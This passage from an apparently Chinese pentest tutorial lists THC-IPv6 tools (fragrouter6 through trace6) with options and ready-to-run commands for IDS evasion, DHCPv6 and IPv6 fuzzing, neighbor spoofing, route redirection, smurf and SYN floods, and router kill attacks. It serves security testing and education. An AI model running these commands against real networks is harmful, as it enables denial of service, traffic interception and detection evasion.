atk6-fragmentation6 -f eth0 fe80::20c:29ff:fef4:8e14 1
atk6-fragmentation6 -fp eth0 fe80::20c:29ff:fef4:8e14 2
atk6-fragmentation6 -n 10 eth0 fe80::20c:29ff:fef4:8e14

45. atk6-fragrouter6

对所有来自您的系统或通过它的已定义数据包执行 NIDS/NIPS 规避。所有规避方法都可以组合(加在一起),但一次只能使用 64 或 128 中的一个。

bash 复制代码
atk6-fragrouter6 -h

选项 1024 可与 1..31 和 64 一起使用。规避方法按以下顺序处理:256、512、2048、1..31/33..63,然后是 64 或 128,然后是 1024。需要设置跳转到 NFQUEUE 的 ip6table 规则,使用 fragrouter6.sh。它是 ip6tables 和 fragrouter6 的包装器!

规避方法

0 无操作

1-31 要插入的原子碎片标头的数量

32 使用 1-31 的目标标头而不是碎片标头

64 将每个数据包分割为 8 字节长度的片段(或更改为-f)

128 一个大型目标报头,用于对数据包进行分段

256 插入伪造的 TCP 数据,其跳数仅用于 IDS (-e)

512 插入 TCP 连接重置数据包,其跳数仅用于 IDS (-e)

1024 插入伪造的分段数据,其跳数仅用于 IDS (-e)

2048 插入伪造的 seq/ack 数据 TCP 数据包

45.1 -f len

迷你片段的大小(选项 64,默认为 8)

bash 复制代码
atk6-fragrouter6 -f 6 eth0 64

45.2 -e count

到 IDS 的跳数以规避(选项 256 和 512)

bash 复制代码
atk6-fragrouter6 -e 15 eth0 512

45.3 -t count

到达目标的跳数

45.4 -v

详细模式,打印所有为规避而处理的数据包

bash 复制代码
atk6-fragrouter6 -e 15 -t 20 -v eth0 1024

46. atk6-fuzz_dhcpc6

发送到 DHCPv6 客户端的模糊消息

bash 复制代码
atk6-fuzz_dhcpc6 -h

选项

-1 fuzz DHCPv6 请求

-2 fuzz DHCPv6 通告(默认)

-3 fuzz DHCPv6 请求

-4 fuzz DHCPv6 确认

-5 fuzz DHCPv6 续订

-6 fuzz DHCPv6 重新绑定

-7 fuzz DHCPv6 回复

-8 fuzz DHCPv6 发布

-9 fuzz DHCPv6 拒绝

-A fuzz DHCPv6 重新配置

-B fuzz DHCPv6 信息请求

-C fuzz DHCPv6 中继转发

-D fuzz DHCPv6 中继回复

-m 也对消息类型进行模糊处理

-v ipv6 受害者的 IPv6 地址(如果未指定,则发送消息的 DHCP 客户端会受到攻击)

-x xid 受害者的事务 ID - 零表示随机(如果未指定 -v,则忽略)

-c client 受害者的客户端 ID - 零表示随机(如果未指定 -v,则忽略)

-f mac 欺骗 mac 地址

-l link 欺骗链接地址

-o options 要发送的 DHCPv6 消息选项(默认值:abcdefghijklmonpqr):

a OPTION_SERVERID

b OPTION_IA_NA

c OPTION_IA_TA

d OPTION_IAADR

e OPTION_ORO

f OPTION_PREFERENCE

g OPTION_ELAPSED_TIME

h OPTION_RELAY_MSG

i OPTION_AUTH

j OPTION_UNICAST

k OPTION_STATUS_CODE

l OPTION_RAPID_COMMIT

m OPTION_USER_CLASS

n OPTION_VENDOR_CLASS

o OPTION_VENDOR_OPTS

p OPTION_INTERFACE_ID

q OPTION_RECONF_MSG

r OPTION_RECONF_ACCEPT

bash 复制代码
atk6-fuzz_dhcpc6 -1 -f 00:11:22:33:44:55 -l example.com -v fe80::20c:29ff:fef4:8e14 -x 0 -c 0 -o a eth0

47. atk6-fuzz_dhcps6

将 DHCPv6 数据包模糊化到服务器。您只能定义 -0 ... -4 类型之一,默认为 -1。如果出现错误,则返回 -1;如果测试完成且目标活动,则返回 0;如果目标崩溃,则返回 1。

bash 复制代码
atk6-fuzz_dhcps6 -h

选项

-1 fuzz DHCPv6 请求(默认)

-2 fuzz DHCPv6 请求

-3 fuzz DHCPv6 确认

-4 fuzz DHCPv6 续订

-5 fuzz DHCPv6 重新绑定

-6 fuzz DHCPv6 释放

-7 fuzz DHCPv6 拒绝

-8 fuzz DHCPv6 信息请求

47.1 -m

模糊消息类型

bash 复制代码
atk6-fuzz_dhcps6 -m 1 eth0

47.2 -t number

从测试号码继续

bash 复制代码
atk6-fuzz_dhcps6 -m -t 10 2 eth0

47.3 -e number

从测试号码继续

bash 复制代码
atk6-fuzz_dhcps6 -e 5 3 eth0

47.4 -T number

仅执行测试号码数字

bash 复制代码
atk6-fuzz_dhcps6 -T 8 4 eth0

47.5 -n number

每个数据包发送次数(默认值:1)

bash 复制代码
 atk6-fuzz_dhcps6 -n 10 5 eth0

47.6 -f

欺骗 mac

bash 复制代码
atk6-fuzz_dhcps6 -f 6 eth0

47.7 -F

欺骗链接地址

bash 复制代码
atk6-fuzz_dhcps6 -F 7 eth0

47.8 -w sec

数据包之间等待的秒数(默认值:0)

bash 复制代码
atk6-fuzz_dhcps6 -w 10 8 eth0

47.9 -p number

每进行一次测试就执行一次活动检查(默认值:无)

bash 复制代码
atk6-fuzz_dhcps6 -p 10 8 eth0

47.10 -d

使用 -d 强制 DNS 更新,您可以在命令行上指定域名。

bash 复制代码
atk6-fuzz_dhcps6 -d 1 eth0

48. atk6-fuzz_ip6

使用可选 EH 和上层传输对 IPv6 数据包进行模糊测试

bash 复制代码
atk6-fuzz_ip6 -h

您只能定义 -0 ... -9、-P 和 -s 中的一个,默认为 -1。

请注意,-P 模糊测试目标应为 ff02::d。如果发生错误则返回 -1,如果测试完成且目标处于活动状态则返回 0,如果目标崩溃则返回 1。

选项

-X 不添加任何 ICMP/TCP 标头(传输层)

-1 模糊 ICMP6 回显请求(默认)

-2 模糊 ICMP6 邻居请求

-3 模糊 ICMP6 邻居通告

-4 模糊 ICMP6 路由器通告

-5 模糊多播侦听器报告数据包

-6 模糊多播侦听器完成数据包

-7 模糊多播侦听器查询数据包

-8 模糊多播侦听器 v2 报告数据包

-9 模糊多播侦听器 v2 查询数据包

-0 模糊节点查询数据包

48.1 -s port

模糊 TCP-SYN 数据包端口

bash 复制代码
atk6-fuzz_ip6 -s -X eth0 fe80::20c:29ff:fef4:8e14

48.2 -P type

fuzz PIMv2 类型数据包(hello、bootstrap、assert)

bash 复制代码
atk6-fuzz_ip6 -P hello eth0 fe80::20c:29ff:fef4:8e14

48.3 -x

尝试所有 256 个标志和字节类型的值

bash 复制代码
atk6-fuzz_ip6 -x eth0 fe80::20c:29ff:fef4:8e14

48.4 -t number

从测试编号继续

bash 复制代码
atk6-fuzz_ip6 -x -2 eth0 fe80::20c:29ff:fef4:8e14

48.5 -T number

仅执行测试编号数字

bash 复制代码
atk6-fuzz_ip6 -t 3 -3 eth0 fe80::20c:29ff:fef4:8e14

48.6 -p number

每进行一次测试(默认:无)执行一次活动检查

bash 复制代码
atk6-fuzz_ip6 -p 4 -4 eth0 fe80::20c:29ff:fef4:8e14

48.7 -a

不执行初始和最终活动测试

bash 复制代码
atk6-fuzz_ip6 -a -5 eth0 fe80::20c:29ff:fef4:8e14

48.8 -n number

发送每个数据包的次数(默认:1)

bash 复制代码
atk6-fuzz_ip6 -n 6 -6 eth0 fe80::20c:29ff:fef4:8e14

48.9 -I

也模糊 IP 标头

bash 复制代码
atk6-fuzz_ip6 -l -7 eth0 fe80::20c:29ff:fef4:8e14

48.10 -F

添加一次性碎片,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -F -8 eth0 fe80::20c:29ff:fef4:8e14

48.11 -S

添加源路由,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -S -9 eth0 fe80::20c:29ff:fef4:8e14

48.12 -D

添加目标标头,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -D -0 eth0 fe80::20c:29ff:fef4:8e14

48.13 -H

添加逐跳标头,并对其进行模糊测试(对于 1 和 5-9)

bash 复制代码
atk6-fuzz_ip6 -H -1 eth0 fe80::20c:29ff:fef4:8e14

48.14 -R

添加路由器警报标头,并对其进行模糊测试(对于 5-9 和所有)

bash 复制代码
atk6-fuzz_ip6 -R -2 eth0 fe80::20c:29ff:fef4:8e14

48.15 -J

添加巨型数据包标头,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -J -3 eth0 fe80::20c:29ff:fef4:8e14

49. atk6-implementation6

执行一些 IPv6 实施检查,也可用于测试一些防火墙功能。大约需要 2 分钟才能完成。

bash 复制代码
atk6-implementation6 -h

49.1 -s sourceip6

使用指定的源 IPv6 地址

49.2 -p

不在开始和结束时执行活动检查

bash 复制代码
atk6-implementation6 -p -s fe80::2 eth0 fe80::20c:29ff:fef4:8e14

50. atk6-implementation6d

通过 implementation6 工具识别测试数据包,有助于检查哪些数据包通过了防火墙

bash 复制代码
atk6-implementation6d -h
bash 复制代码
atk6-implementation6d eth0

51. atk6-inject_alive6

此工具响应 PPPoE 和 6in4 隧道上的保持活动请求;对于 PPPoE 它还会发送保持活动请求。请注意,必须设置适当的环境变量 THC_IPV6_{PPPOE|6IN4}

bash 复制代码
atk6-inject_alive6 -h

选项 -a 将每 15 秒主动发送活动请求。

选项 -p 将不会发送对活动请求的回复。

bash 复制代码
atk6-inject_alive6 -ap eth0

52. atk6-inverse_lookup6

执行反向地址查询,以获取分配给 MAC 地址的 IPv6 地址。请注意,目前只有少数系统支持此功能。

bash 复制代码
atk6-inverse_lookup6 -h
bash 复制代码
atk6-inverse_lookup6 eth0 00:11:22:33:44:55

53. atk6-kill_router6

宣布目标路由器即将关闭,并将其从路由表中删除。

如果您提供"*"作为路由器地址,此工具将嗅探网络中是否存在RA 数据包并立即发送终止数据包。

bash 复制代码
atk6-kill_router6 -h

选项 -H 添加逐跳、-F 分段标头和 -D dst 标头。

bash 复制代码
atk6-kill_router6 -HFD eth0 fe80::20c:29ff:fef4:8e14

54. atk6-ndpexhaust26

使用 ICMPv6 TooBig 错误淹没目标 /64 网络消息。此工具版本比 ndpexhaust6 有效很多倍。

bash 复制代码
atk6-ndpexhaust26 -h

-a 添加带有路由器警报的逐跳标头

-c 不计算校验和以节省时间

-p 发送 ICMPv6 回显请求

-P 发送 ICMPv6 回显回复

-T 发送 ICMPv6 生存时间已结束

-U 发送 ICMPv6 不可达(无路由)

-r 从 /64 前缀随机化源

-R 完全随机化源

-m 生成最大大小的数据包

-s sourceip6 将此用作源 IPv6 地址

bash 复制代码
atk6-ndpexhaust26 -acpPTUrRm -s fe80::1 eth0 fe80::20c:29ff:fef4:8e14

55. atk6-ndpexhaust6

随机 ping 目标网络中的 IP。请注意:ndpexhaust6 已弃用,请使用 ndpexhaust26!

bash 复制代码
atk6-ndpexhaust6 -h
bash 复制代码
atk6-ndpexhaust6 eth0 ff80::01/16

56. atk6-node_query6

向目标发送 ICMPv6 节点查询请求并转储回复。

bash 复制代码
atk6-node_query6 -h
bash 复制代码
atk6-node_query6 eth0 fe80::20c:29ff:fef4:8e14

57. atk6-parasite6

这是 IPv6 的"ARP​​ 欺骗器",通过对邻居请求做出错误回答,将所有本地流量重定向到您自己的系统(如果不存在 fake-mac,则为涅槃)

bash 复制代码
atk6-parasite6 -h

选项 -l 循环并每 5 秒重新发送每个目标的数据包。

选项 -R 还将尝试注入请求的目的地

NS 安全绕过:-F 片段、-H 逐跳和 -D 大目标标头

bash 复制代码
atk6-parasite6 -lRFHD eth0

58. atk6-passive_discovery6

被动嗅探网络并转储检测到的所有客户端 IPv6 地址。

请注意,在交换环境中,如果另外启动 parasite6,则可以获得更好的结果,但这会影响网络。如果在接口后指定了脚本名称,则将以检测到的 ipv6 地址作为第一个选项、以接口作为第二个选项来调用该脚本。

bash 复制代码
atk6-passive_discovery6 -h

-D 也转储目标地址(不适用于 -m)

-s 仅打印地址,不输出其他内容

-m maxhop 转储目标可能离开的最大跳数。0 表示仅限本地,有意义的最大数量通常为 5

-R prefix 将定义的前缀与链接本地前缀交换

bash 复制代码
atk6-passive_discovery6 -Ds -R fe80 eth0
atk6-passive_discovery6 -m 5 -R fe80 eth0

59. atk6-randicmp6

将所有 ICMPv6 类型和代码组合发送到目标。

bash 复制代码
atk6-randicmp6 -h

选项 -s 设置源 IPv6 地址。

选项 -p 不会打印收到的答案。

bash 复制代码
atk6-randicmp6 -p -s fe80 eth0 fe80::20c:29ff:fef4:8e14

60. atk6-redir6

将路由植入 victim-ip,将所有流量重定向到 target-ip 到new-ip。您必须知道处理路由的路由器。如果 new-router-mac 不存在,则会导致 DOS。如果目标的 TTL 不是 64,则指定这是最后一个选项。

bash 复制代码
atk6-redir6 -h
bash 复制代码
atk6-redir6 eth0 fe80::1 fe80::2 fe80::3 fe80::4

61. atk6-redirsniff6

在 victim-ip 中植入路由,将所有到 destination-ip 的流量重定向到 new-router。所有经过的、与 victim->target 匹配的流量都会执行此操作。您必须知道处理该路由的路由器。

如果 new-router/-mac 不存在,则会导致 DOS。您可以为 victim-ip 和/或 destination-ip 提供通配符 ('*')。

bash 复制代码
atk6-redirsniff6 -h
bash 复制代码
atk6-redirsniff6 eth0 fe80::1 fe80::2 fe80::3 fe80::4

62. atk6-rsmurf6

对受害者的本地网络进行 Smurf 攻击。注意:这取决于实现错误,目前仅在 Linux 上验证。

Evil:"ff02::1"作为受害者将完全对您的本地 LAN 进行 DOS 攻击

bash 复制代码
atk6-rsmurf6 -h
bash 复制代码
atk6-rsmurf6 eth0 fe80::20c:29ff:fef4:8e14

63. atk6-sendpees6

发送 SEND 邻居请求消息并使目标验证大量 CGA 和 RSA 签名

bash 复制代码
atk6-sendpees6 -h
bash 复制代码
atk6-redir6 eth0 fe80::1 fe80::2 fe80::3 fe80::4

64. atk6-sendpeesmp6

发送 SEND 邻居请求消息,并使目标验证大量 CGA 和 RSA 签名

原始 sendpees 由 willdamn <willdamn@gmail.com> 编写

修改后的 sendpeesMP 由 Marcin Pohl <marcinpohl@gmail.com> 基于 thc-ipv6 的代码编写

bash 复制代码
atk6-sendpeesmp6 -h
bash 复制代码
atk6-sendpeesmp6 eth0 2048 fe80:: fe80::1

65. atk6-smurf6

使用 icmp echo 回复对目标进行 Smurf。如果未指定,则 echo 请求的目标是本地所有节点多播地址

bash 复制代码
atk6-smurf6 -h
bash 复制代码
atk6-smurf6 -i 1000 eth0 fe80::20c:29ff:fef4:8e14

66. atk6-thcping6

使用特殊 IPv6 或 EH 标头选项制作 ICMPv6/TCP/UDP 数据包。

如果出现错误或没有回复,则返回 -1;如果回复正常,则返回 0;如果回复错误,则返回 1。

bash 复制代码
atk6-thcping6 -h

66.1 -x

泛洪模式(不检查回复)

bash 复制代码
atk6-thcping6 -x eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.2 -w ms

数据包之间的等待时间(以毫秒为单位)(默认值:1000,如果 -n 不为 1)

bash 复制代码
atk6-thcping6 -w 1000 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.3 -a

添加带有路由器警报选项的逐跳标头。

66.4 -q

添加带有快速启动选项的逐跳标头。

66.5 -E

以 ethertype IPv4 发送

66.6 -e

ethertype 以指定的 ethertype 发送(十六进制!)

66.7 -H t:l:v

添加带有特殊内容的逐跳标头

66.8 -D t:l:v

添加带有特殊内容的目标标头

66.9 -D "xxx"

添加大型目标标头,用于对数据包进行分段

bash 复制代码
atk6-thcping6 -Eaq -e 0x86DD -H 1:2:0eab -D 1:2:0eab eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.10 -f

添加一次性分段标头

66.11 -F ipv6address

使用源路由到此最终目标

66.12 -t ttl

指定 TTL(默认值:255)

66.13 -c class

指定类(0-4095)

66.14 -l label

指定标签(0-1048575)

bash 复制代码
atk6-thcping6 -f -F fe80::3 -t 255 -c 2048 -l 1000 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.15 -L length

设置伪造的有效负载长度(0-65535)

66.16 -N nextheader

设置伪造的下一个标头(0-255)

66.17 -V version

设置 IP 版本(0-15)

66.18 -d data_size

定义 ping 数据缓冲区的大小

bash 复制代码
atk6-thcping6 -L 2048 -N 128 -V 8 -d 100 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.19 -O

发送 TCP Fast Open cookie 请求选项(需要 -S)

66.20 -T number

ICMPv6发送类型(默认值:128 = ping)

bash 复制代码
atk6-thcping6 -T 128 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.21 -C number

发送 ICMPv6 代码数(默认值:0)

66.22 -S port

在定义的端口上使用 TCP SYN 数据包,而不是 ping

bash 复制代码
atk6-thcping6 -O -S 128 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.23 -U port

在定义的端口上使用 UDP 数据包,而不是 ping

66.24 -n count

发送数据包的频率(默认值:1)

bash 复制代码
atk6-thcping6 -U 80 -n 1 eth0 fe80:: fe80::20c:29ff:fef4:8e14

t:l:v 语法:类型:长度:值,值为十六进制,例如 1:2:0eab。您可以将"x"放入 src6、srcmac 和 dstmac 中以获取自动值。

67. atk6-thcsyn6

用 TCP-SYN 数据包淹没目标端口。如果您提供"x"作为端口,则它是随机的。

bash 复制代码
atk6-thcsyn6 -h

-i 发送数据包间隔(以微秒为单位)

-a 添加带有路由器警报的逐跳标头

-d 添加目标标头(最多可设置 64 次)

-f 添加原子碎片标头(最多可设置 64 次)

-A 发送 TCP-ACK 数据包

-S 发送 TCP-SYN-ACK 数据包

-r 从 /64 前缀随机化源

-R 完全随机化源

-D 随机化目标(视为 /64)

-O 添加 TCP Fast Open cookie (仅 SYN 数据包)

-m dstmac 使用此目标 mac 地址

-s sourceip6 使用此地址作为源 IPv6 地址

-p port 使用固定源端口

bash 复制代码
atk6-thcsyn6 -aAcdDfrORS -i 2000 -m 00:11:22:33:44:55 -p 80 -s fe80:: eth0 fe80::20c:29ff:fef4:8e14 8080

68. atk6-toobig6

在目标上植入指定的 mtu。如果目标的 TTL 不是 64,则将其指定为最后一个选项。

bash 复制代码
atk6-toobig6 -h

选项 -u 将发送 TooBig,而无需从现有 ip 发送欺骗性的 ping6。

bash 复制代码
atk6-toobig6 -u eth0 fe80::1 fe80::2 1400

69. atk6-toobigsniff6

嗅探来自目标的数据包,并根据指定 MTU 的数据包发送 ICMPv6 过大错误消息。如果您提供 '*' 作为地址,则将使用任何全局流量嗅探。

bash 复制代码
atk6-toobigsniff6 -h

如果您提供选项 -c,该工具不会在第一个数据包匹配时退出,而是继续运行并发送数据包,直到中止。

bash 复制代码
atk6-toobigsniff6 -c eth0 fe80::1 fe80::2 1400

70. atk6-trace6

一个基本但非常快速的 traceroute6 程序。

bash 复制代码
atk6-trace6 -h

如果未指定端口,则使用 ICMP6 Ping 请求,否则将 TCP SYN数据包发送到指定端口。选项 D、E 和 F 可以多次使用。

70.1 -a

插入带有路由器警报选项的逐跳标头。

bash 复制代码
atk6-trace6 -a -s fe80:: eth0 fe80::20c:29ff:fef4:8e14 80

70.2 -D

插入目标扩展标头

bash 复制代码
atk6-trace6 -D eth0 fe80::20c:29ff:fef4:8e14 80 

70.3 -E

插入带有无效选项的目标扩展标头

bash 复制代码
atk6-trace6 -E eth0 fe80::20c:29ff:fef4:8e14 80

70.4 -F

插入一次性碎片标头

bash 复制代码
atk6-trace6 -F eth0 fe80::20c:29ff:fef4:8e14 80

70.5 -b

不要使用 ICMP6 Ping,而是使用 TooBig(您将看不到目标)

bash 复制代码
atk6-trace6 -b eth0 fe80::20c:29ff:fef4:8e14 80

70.6 -B

不要使用 ICMP6 Ping,而是使用 PingReply(您将看不到目标)

bash 复制代码
atk6-trace6 -B eth0 fe80::20c:29ff:fef4:8e14

70.7 -d

将 IPv6 地址解析为 DNS。

70.8 -t

启用隧道检测

70.9 -u

如果提供了端口,则使用 UDP 而不是 TCP

bash 复制代码
atk6-trace6 -dtu eth0 fe80::20c:29ff:fef4:8e14 80

70.10 -r

原始模式(适用于没有以太网的适配器网络)

bash 复制代码
atk6-trace6 -r eth0 fe80::20c:29ff:fef4:8e14

70.11 -s src6

指定源 IPv6 地址

最大跳数范围:31

bash 复制代码
atk6-trace6 -s fe80:: eth0 fe80::20c:29ff:fef4:8e14

总结

THC-IPv6工具提供强大的网络渗透测试功能,通过多种模块实现IPv6环境中的漏洞利用和安全测试,是研究协议实现和检测网络漏洞的实用工具。

在此特别强调,本教程仅在合法授权的情况下进行测试和研究,请勿用于其他用途。未经授权使用此类工具可能会侵犯他人隐私,触犯相关法律,任何因此引发的法律或利益纠纷与本人无关。

欢迎各位大佬,小白来找我交流。

相关推荐
路溪非溪6 分钟前
关于Linux内核中头文件问题相关总结
linux
木易双人青12 分钟前
01-Docker-简介、安装与使用
运维·docker·容器
专注API从业者1 小时前
Python + 淘宝 API 开发:自动化采集商品数据的完整流程
大数据·运维·前端·数据挖掘·自动化
三坛海会大神5552 小时前
计算机网络参考模型与子网划分
网络·计算机网络
云卓SKYDROID2 小时前
无人机激光测距技术应用与挑战
网络·无人机·吊舱·高科技·云卓科技
Lovyk2 小时前
Linux 正则表达式
linux·运维
Fireworkitte3 小时前
Ubuntu、CentOS、AlmaLinux 9.5的 rc.local实现 开机启动
linux·ubuntu·centos
sword devil9004 小时前
ubuntu常见问题汇总
linux·ubuntu
ac.char4 小时前
在CentOS系统中查询已删除但仍占用磁盘空间的文件
linux·运维·centos
zskj_zhyl4 小时前
家庭健康能量站:微高压氧舱结合艾灸机器人,智享双重养生SPA
人工智能·科技·安全·机器人